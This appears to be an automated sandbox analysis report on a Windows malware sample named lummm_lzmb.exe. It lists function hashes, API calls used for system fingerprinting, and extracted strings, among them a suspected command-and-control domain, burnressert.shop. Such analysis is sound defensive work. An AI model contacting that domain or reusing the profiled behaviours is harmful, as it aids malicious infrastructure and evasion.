Opcode ID: d533a80f1657d02e47366a0fc091d62cfee5bbafe8c45af7897660e595647cae
Instruction ID: fa57ee3e1821fc003173cd13b3655179ca34342cdc71f9eb0fda592141dd5797
Opcode Fuzzy Hash: d533a80f1657d02e47366a0fc091d62cfee5bbafe8c45af7897660e595647cae
Instruction Fuzzy Hash: F4C092783000009FC388DA19C895821F3A2EBC8208324C0ADA80DC7359EF32EC03DA50

Function 012B2D48 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a368bc61fe859f814ffb662f1197ec729d0f3276b6853e24fa0a42ead13c8547
Instruction ID: 902312a679f5f1d3b43d4023dc19bcc4703f3d323a3749ab7a669b8ceb202a8d
Opcode Fuzzy Hash: a368bc61fe859f814ffb662f1197ec729d0f3276b6853e24fa0a42ead13c8547
Instruction Fuzzy Hash: 41B01234108248E705001DC7744A4EA3AAED2819B57508051E10F4F34CAEB76C4107E5

Function 012B34A0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4191b5bae62836cff7e4c717ec497859ec2a9461513f7c2e33bf312df553616
Instruction ID: cc3635861f1c61339e1e692bdb1eebadd2cde8f074ca46bd46dfb59018996978
Opcode Fuzzy Hash: a4191b5bae62836cff7e4c717ec497859ec2a9461513f7c2e33bf312df553616
Instruction Fuzzy Hash: 1DB012B4240348F7C6102ECB749B91A3E4FE2C09947448041F10B4629D9E725D004B9A

Function 012B8E18 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec81736adb9f62dcb6b052c67774177d72696d4b00d3b9288fdd747aa8750a7b
Instruction ID: 3e15cb9bde3485b0b9445a9b58fdd6340d0fd542c17b97856e2a4dc91e822f1d
Opcode Fuzzy Hash: ec81736adb9f62dcb6b052c67774177d72696d4b00d3b9288fdd747aa8750a7b
Instruction Fuzzy Hash: 0CB0124539030C33840130D72441861395F81F09DCD108042E61A0B76898725E012155

Function 012B167C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd75148f6c60cb7b0afb9c79dfca2259f78c56ebea92eaddc2185b82a3b567bd
Instruction ID: bffe67ca8685c35814f6cef81e25811b114f4e6cefedc363d5eacf4dcfaefa60
Opcode Fuzzy Hash: bd75148f6c60cb7b0afb9c79dfca2259f78c56ebea92eaddc2185b82a3b567bd
Instruction Fuzzy Hash: 5FC04C3503459989D691DE5498918E87E31AE42374B544B5180B1852EAC37051559645

Function 02E40EF0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebb9a15ece57f990afe37748d4b7fe1266a680df08e81003828234c50fee488
Instruction ID: c5e26229662c9432f9bc7476c6ece914768bd3db68507641d2468841d4d27353
Opcode Fuzzy Hash: 9ebb9a15ece57f990afe37748d4b7fe1266a680df08e81003828234c50fee488
Instruction Fuzzy Hash: 2AB092341602088F82409B59D448C00B3ECAF08A2434140D0E1088B632C621F8008A40

Function 02E401C0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
Instruction ID: cfd3c94acb28e12ede7e7a80c62375d018fe088f1f186957f4485c32e65079b3
Opcode Fuzzy Hash: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
Instruction Fuzzy Hash: 6CB092301602088F82009A59E448C0137ACAF08A0434100D0E1088B632C621F8008A51

Function 02E40E90 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
Instruction ID: 308734e347fe5fbfc39d01466d26648a0473cab39bdc6a53ba3d68073832f9aa
Opcode Fuzzy Hash: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
Instruction Fuzzy Hash: 93B01230240208CFC200DB5DD444C0033FCAF49A0434000D0F1098B731C721FC00CA40

Function 02E40E60 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ae3ba540910b091e824c5a366ac469e9e0fe41833a5392c62e6ba6aae3dbc62
Instruction ID: c87432069a4436e800c2ec2c57100618ece54d1f6daa2fcba48088c5cd1b648d
Opcode Fuzzy Hash: 7ae3ba540910b091e824c5a366ac469e9e0fe41833a5392c62e6ba6aae3dbc62
Instruction Fuzzy Hash: 03B0923200010CFB8B012E81E8088897F29EB14260B00C011FA080402087329520AB98

Function 02E40510 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
Instruction ID: 38f246181df111d5429a8bd68a772e0fce3d181c3253e5a9de7ce3dab65c4b62
Opcode Fuzzy Hash: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
Instruction Fuzzy Hash: F4B01230240208CFC300DB5DD445C003BFCAF49A0434000D0F1088B731C721FC008A40

Function 012B0848 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4820098840f98782cd19aa61199b3db8af856299c1cb7adc322624c6c40e9bba
Instruction ID: 6b5cbe47e384a81fb3b5c3fac703522b6a37d2446a5cc624412075d0b22f6aa5
Opcode Fuzzy Hash: 4820098840f98782cd19aa61199b3db8af856299c1cb7adc322624c6c40e9bba
Instruction Fuzzy Hash: A0A01132000308CB83202BA0B88C00CBBACAA882023808020A00E8200A8AB028028B80

Non-executed Functions

Function 07570027 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754d2192b4e587e4dfe9e6ab9ce03f6b8b1cb2b51824c9e909535f686780a8a3
Instruction ID: 57dc69e214a29d7d4366e741e4f5511410f4a43c475842bdef2a90553a2e6703
Opcode Fuzzy Hash: 754d2192b4e587e4dfe9e6ab9ce03f6b8b1cb2b51824c9e909535f686780a8a3
Instruction Fuzzy Hash: 9821E8B1D046598BEB29CF6B9C453DABAF7AFC9304F04C0BAD40CA6255EB710A85CF51

Function 07570040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96478fc8c09c1e688672aca17449384706f623e8cfef97f832a560d4cb1faab2
Instruction ID: 3f09ffb51303c44fac6cfe74c3d50bb94cb7924b45295c2fe0603003f6bcda79
Opcode Fuzzy Hash: 96478fc8c09c1e688672aca17449384706f623e8cfef97f832a560d4cb1faab2
Instruction Fuzzy Hash: 2421A9B1E056198BEB28CF6B9C443D9FAF6BBC9315F04C1BAD40CA6255EB700A458E51

Analysis Process: lummm_lzmb.exePID: 6780, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	45.4%
Total number of Nodes:	313
Total number of Limit Nodes:	24

Executed Functions

Function 007C20B0 Relevance: 156.0, APIs: 5, Strings: 83, Instructions: 1987COMMON

Download Yara Rule

Strings

6, xrefs: 007C2ED4
C, xrefs: 007C2F9D
7, xrefs: 007C3603
2, xrefs: 007C29D4
3, xrefs: 007C3623
;, xrefs: 007C29B4
5, xrefs: 007C35F3
#, xrefs: 007C3B00
7, xrefs: 007C3A60
j, xrefs: 007C39F8
1, xrefs: 007C2F0C
., xrefs: 007C2C50
D, xrefs: 007C3E2F
i, xrefs: 007C39C8
{, xrefs: 007C27EC
[, xrefs: 007C3A58
_, xrefs: 007C3A78
c, xrefs: 007C37A3
u, xrefs: 007C368B
b, xrefs: 007C379B
9, xrefs: 007C3AB0
a, xrefs: 007C3793
d, xrefs: 007C22AB
v, xrefs: 007C21B9
,, xrefs: 007C2162
-, xrefs: 007C3B10
), xrefs: 007C223B
=, xrefs: 007C3A90
a, xrefs: 007C3A08
f, xrefs: 007C367B
;, xrefs: 007C35E3
0, xrefs: 007C2F04
;, xrefs: 007C3AC0
=, xrefs: 007C2E26
`, xrefs: 007C304F
?, xrefs: 007C2E36
H, xrefs: 007C3571
1, xrefs: 007C3613
3, xrefs: 007C3A80
N, xrefs: 007C2FA7
{, xrefs: 007C24C8
K, xrefs: 007C2ECC
4, xrefs: 007C2EE4
2, xrefs: 007C2EF4
e, xrefs: 007C3773
D, xrefs: 007C3BD5
;, xrefs: 007C2E16
`, xrefs: 007C25E4
6, xrefs: 007C2CDD
!, xrefs: 007C2E46
4, xrefs: 007C2CE7
G, xrefs: 007C3AD8
g, xrefs: 007C3783
#, xrefs: 007C23F2
m, xrefs: 007C3733
5, xrefs: 007C3A50
z, xrefs: 007C36DB
!, xrefs: 007C3AF0
t, xrefs: 007C2BB1
%, xrefs: 007C3AD0
y, xrefs: 007C22A6
G, xrefs: 007C21B4
O, xrefs: 007C356C
', xrefs: 007C3AE0
t, xrefs: 007C27F1
9, xrefs: 007C2E06
;, xrefs: 007C315B
, xrefs: 007C2E3E
/, xrefs: 007C3B20
_, xrefs: 007C3A88
5, xrefs: 007C29C4
k, xrefs: 007C3763
I, xrefs: 007C3576
o, xrefs: 007C3743
%, xrefs: 007C2CD8
?, xrefs: 007C3AA0
i, xrefs: 007C3753
Z, xrefs: 007C3AA8
a, xrefs: 007C3A48
., xrefs: 007C3B18
7, xrefs: 007C2CE2
1, xrefs: 007C3A70
*, xrefs: 007C3A38

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: $!$!$#$#$%$%$'$)$*$,$-$.$.$/$0$1$1$1$2$2$3$3$4$4$5$5$5$6$6$7$7$7$9$9$;$;$;$;$;$=$=$?$?$C$D$D$G$G$H$I$K$N$O$Z$[$_$_$`$`$a$a$a$b$c$d$e$f$g$i$i$j$k$m$o$t$t$u$v$y$z${${
API String ID: 0-2305756509
Opcode ID: b56a2322df49d3991eaaf4f2ad27bcc6017019126fa81f280456a95f82042afe
Instruction ID: 58301da5b880e5148dc31024353987c74c0b68dea3ae922632dfc3daaacc0974
Opcode Fuzzy Hash: b56a2322df49d3991eaaf4f2ad27bcc6017019126fa81f280456a95f82042afe
Instruction Fuzzy Hash: E303DF7150C7C08AD3359B3888447AFBFE1AB96324F188A6DE4E9873D2D6788946C753

Function 007EA140 Relevance: 27.1, APIs: 11, Strings: 4, Instructions: 862
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(5C5F5E19,00000000,00000001,B4B7B6AC,00000000), ref: 007EA50A
SysAllocString.OLEAUT32 ref: 007EA58F
CoSetProxyBlanket.COMBASE(F7A38AF0,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 007EA5D4
SysAllocString.OLEAUT32 ref: 007EA648
SysAllocString.OLEAUT32 ref: 007EA6FD
VariantInit.OLEAUT32(?), ref: 007EA76B
VariantClear.OLEAUT32(?), ref: 007EA9E8
SysFreeString.OLEAUT32(?), ref: 007EAA0C
SysFreeString.OLEAUT32(?), ref: 007EAA15
SysFreeString.OLEAUT32(00000000), ref: 007EAA29
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 007EAA5A

Strings

h^, xrefs: 007EA16F
%ABC, xrefs: 007EA247
?sOf, xrefs: 007EA3F2
I)+, xrefs: 007EA43E

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: h^$%ABC$?sOf$I)+
API String ID: 2573436264-2754038976
Opcode ID: 4b8fd9e0b05ba1d207578dffc783df0427de2febc35a629787fed21e79456a20
Instruction ID: 85dc33cc0cd3ff6e065fd0769181099215d90b05d40ed7c29994b8fc00bda076
Opcode Fuzzy Hash: 4b8fd9e0b05ba1d207578dffc783df0427de2febc35a629787fed21e79456a20
Instruction Fuzzy Hash: 8C421371A093809FD7248F25C84176BBBE1EFD9710F19892DE5D49B381D678E806CB93

Function 007C7FA6 Relevance: 21.6, APIs: 1, Strings: 11, Instructions: 610
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dk`S, xrefs: 007C855C
^;w5, xrefs: 007C88CB
M{K[, xrefs: 007C8546
FG, xrefs: 007C895A
\`Yc, xrefs: 007C864D
I|z{, xrefs: 007C853B
STdb, xrefs: 007C8551
trFO, xrefs: 007C8530
UW, xrefs: 007C8663
yu}F, xrefs: 007C851A
RQ^S, xrefs: 007C8658

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: FG$I|z{$M{K[$RQ^S$STdb$UW$\`Yc$^;w5$dk`S$trFO$yu}F
API String ID: 0-1595289752
Opcode ID: e358fbbdd7a036326ceecc2e25450efb1f181e0a28701d9ec2215c803acba844
Instruction ID: 8e1d7a0ef15054ace26edaf2caaa6a46f105836eab06e3fc12ff166790b5bf84
Opcode Fuzzy Hash: e358fbbdd7a036326ceecc2e25450efb1f181e0a28701d9ec2215c803acba844
Instruction Fuzzy Hash: 8022BFB1608381CFD734CF24D895BABB7E1EB95314F148A2CE4D98B241EB389945CB93

Function 007BDA68 Relevance: 8.1, APIs: 2, Strings: 3, Instructions: 633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 007BDA74
CoUninitialize.COMBASE ref: 007BDE83

Strings

burnressert.shop, xrefs: 007BDE58, 007BE276
WTF\, xrefs: 007BDF15
IPED, xrefs: 007BDF20

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: Uninitialize
String ID: IPED$WTF\$burnressert.shop
API String ID: 3861434553-2766824413
Opcode ID: b0cc761405249b069f8b3638178134d3bd4bb3bebfe9aaef6f61878e592c23ec
Instruction ID: 0691f539182697688ab04ee40614dbd6a8f9bcff208c6ae2ef731ec73dd1b86b
Opcode Fuzzy Hash: b0cc761405249b069f8b3638178134d3bd4bb3bebfe9aaef6f61878e592c23ec
Instruction Fuzzy Hash: E612D1B150D3D08FD335CF6594A47EBBBE1ABE6304F1889ACD4D95B251D7380806CBA6

Function 007B8750 Relevance: 7.7, APIs: 5, Instructions: 197
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 007B8774
GetCurrentThreadId.KERNEL32 ref: 007B877D
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 007B8824
GetForegroundWindow.USER32 ref: 007B884B
ExitProcess.KERNEL32 ref: 007B89A9

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 9abd9f7e375b9b4c8ebc2b4f5e709093f549c865dc72cc7771d21887aff60371
Instruction ID: e3f51ccacf9c1fdce8c665683393fd9137b89d78ad5c57fdc507617f9e761379
Opcode Fuzzy Hash: 9abd9f7e375b9b4c8ebc2b4f5e709093f549c865dc72cc7771d21887aff60371
Instruction Fuzzy Hash: B9515CB2B443004BD7186E79DC563A6B6CA9BC4310F1EC13DAD99DB3E2E97C9C01C256

Function 007DD9A2 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007DDB69

Strings

t, xrefs: 007DD9B2
2*, xrefs: 007DDB81

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 2*$t
API String ID: 3960555810-3896277123
Opcode ID: 2577db23db9406687ff3254e94e3268872b799e3b851193ef8eb55d09f44dc25
Instruction ID: 6ffc4f3a5ccb4f8515239b6bb5f019e7da139bdf8a66b745c4206f6bd9646c50
Opcode Fuzzy Hash: 2577db23db9406687ff3254e94e3268872b799e3b851193ef8eb55d09f44dc25
Instruction Fuzzy Hash: 51B1A37160C3828FD729CF2984503AAFBE19FE7304F18896ED0D997392D7798906CB56

Function 007BE709 Relevance: 3.9, Strings: 3, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pW, xrefs: 007BE8D6
D07FA3A9B25E9A5EDA6C202D02A30F20, xrefs: 007BE805
~x, xrefs: 007BE709

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: D07FA3A9B25E9A5EDA6C202D02A30F20$pW$~x
API String ID: 0-451263951
Opcode ID: 346ba4e3645d7e2b6e1c6b3215d36c2756deda5663cafeefae16f144e5ee917c
Instruction ID: afa21cc74b672ea2a62420e3f5ce623b87168073b774934f8d37d7d57b409559
Opcode Fuzzy Hash: 346ba4e3645d7e2b6e1c6b3215d36c2756deda5663cafeefae16f144e5ee917c
Instruction Fuzzy Hash: 98415972D483504BC7248B289CA97EFA7E1DFF2314F198A3CD4CAA7351EA38594187D6

Function 007B9C80 Relevance: 3.8, Strings: 3, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

]_, xrefs: 007B9D68, 007B9D6F
zctu, xrefs: 007B9CA0
!, xrefs: 007B9D1C

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: !$zctu$]_
API String ID: 0-1076383043
Opcode ID: 0279dd1a1507c3d3d3a4c2ccd668baf13fad2bc2c2785891a98fb7458ebc6719
Instruction ID: d98ce5a0d787284192087b59aed474c6e770e27e6fdfce5ee25af736b4389cda
Opcode Fuzzy Hash: 0279dd1a1507c3d3d3a4c2ccd668baf13fad2bc2c2785891a98fb7458ebc6719
Instruction Fuzzy Hash: B02178B2A083404BD308CF65ECD176BBBD6AFD2304F19492CE2D41B741C6B58806C7AA

Function 007D4F7F Relevance: 2.9, Strings: 2, Instructions: 366COMMON

Download Yara Rule

Strings

LB, xrefs: 007D5265
\R, xrefs: 007D5281

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: LB$\R
API String ID: 0-3990695373
Opcode ID: c84e8b6a278c7c07394598251d50e01fcb7a7ed748e9110088a2927d14158e25
Instruction ID: ca8866570ad3d83bee76fe6f839ac2e1d546a12af253aaf6e4d15cb17874fe3d
Opcode Fuzzy Hash: c84e8b6a278c7c07394598251d50e01fcb7a7ed748e9110088a2927d14158e25
Instruction Fuzzy Hash: B3D143B0A00711CFCB28CF65C9A067ABBB0FF49310B588A5DD896AF755D378A901CF95

Function 007F0ED0 Relevance: 2.9, Strings: 2, Instructions: 353COMMON

Download Yara Rule

Strings

aD>3, xrefs: 007F0FB2
eD>3, xrefs: 007F0FED

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: InitializeThunk
String ID: aD>3$eD>3
API String ID: 2994545307-3410704336
Opcode ID: 21357df2cc129d21316e6d945ac0fb7a8b0d5ec7d02a8862f4a2a0db55bdc66f
Instruction ID: 1c913182024f08731ec2987d200ed93646f49a2c5bb790ad5aa232facb4c50f8
Opcode Fuzzy Hash: 21357df2cc129d21316e6d945ac0fb7a8b0d5ec7d02a8862f4a2a0db55bdc66f
Instruction Fuzzy Hash: 71A127356083098BD714DF29CC9157AB7E2EFD9360F19CA2CE69587395EB389C42C742

Function 007EF079 Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

@, xrefs: 007EF2EA
EVWT, xrefs: 007EF325

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: @$EVWT
API String ID: 0-3621553784
Opcode ID: 4de9a32710bea9dcaf2d510f75b3f01e44150862369b199d59c17f0d3a38886a
Instruction ID: 090f0719b47474b4f1f82692f1e32468063f670240cfddf9f404c7dcda8ece15
Opcode Fuzzy Hash: 4de9a32710bea9dcaf2d510f75b3f01e44150862369b199d59c17f0d3a38886a
Instruction Fuzzy Hash: 9F4103B56193818BD714CF26C85127BB7E2EFD5354F28992CE496C72A1E73CC8058B42

